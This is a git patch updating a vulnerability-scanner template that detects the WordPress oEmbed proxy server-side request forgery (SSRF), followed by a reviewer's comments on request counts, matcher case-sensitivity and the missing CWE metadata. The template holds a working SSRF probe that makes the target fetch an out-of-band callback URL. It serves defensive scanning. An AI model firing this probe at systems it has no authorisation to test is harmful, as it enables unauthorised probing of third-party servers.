From 93863aeb08ad66002d3cf64928cdcab0e1156925 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 4 Sep 2023 23:43:10 +0530
Subject: [PATCH] Update wordpress-ssrf-oembed.yaml
---
 .../wordpress/wordpress-ssrf-oembed.yaml | 32 +++++++++++--------
 1 file changed, 19 insertions(+), 13 deletions(-)
diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
index ac39f6ee4d..d62f4a5f56 100644
--- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
@@ -1,29 +1,35 @@
 id: wordpress-ssrf-oembed
 info:
- name: Wordpress Oembed Proxy SSRF
+ name: Wordpress Oembed Proxy - Server-side request forgery
 author: dhiyaneshDk
 severity: medium
 reference:
 - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
 - https://github.com/incogbyte/quickpress/blob/master/core/req.go
- tags: wordpress,ssrf,oast,proxy
 metadata:
- fofa-query: body="oembed" && body="wp-"
 max-request: 1
+ fofa-query: body="oembed" && body="wp-"
+ tags: wordpress,ssrf,oast,oembed
 http:
- - method: GET
- path:
- - "{{BaseURL}}/wp-json/oembed/1.0/proxy"
- - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
+ - raw:
+ - |
+ GET /wp-json/oembed/1.0/proxy HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
 matchers-condition: and
 matchers:
- - type: dsl
- dsl:
- - 'contains(to_lower(response_1), "rest_missing_callback_param")'
+ - type: word
+ part: body_1
+ words:
+ - 'rest_missing_callback_param'
- - type: dsl
- dsl:
- - 'contains(interactsh_protocol, "http")'
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
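Review bot: `max-request: 1` under `metadata` does not match the new `raw` block, which sends two requests (the bare proxy call and the one carrying `url=http://{{interactsh-url}}`); it should read `max-request: 2` so the request budget reported for a scan is accurate. The first matcher moved from `contains(to_lower(response_1), ...)` to a case-sensitive `word` match on `body_1`; the REST error code is normally lowercase, but adding `case-insensitive: true` to that matcher would keep the old behaviour exactly. The `info` block still has no `description` or `classification` (CWE-918 would fit), which leaves whoever triages the finding without a statement of impact or remediation. The description could also note that an HTTP callback by itself may come from an intermediary that fetches URLs seen in query strings, so a hit should be confirmed against the WordPress host's own egress before it is reported.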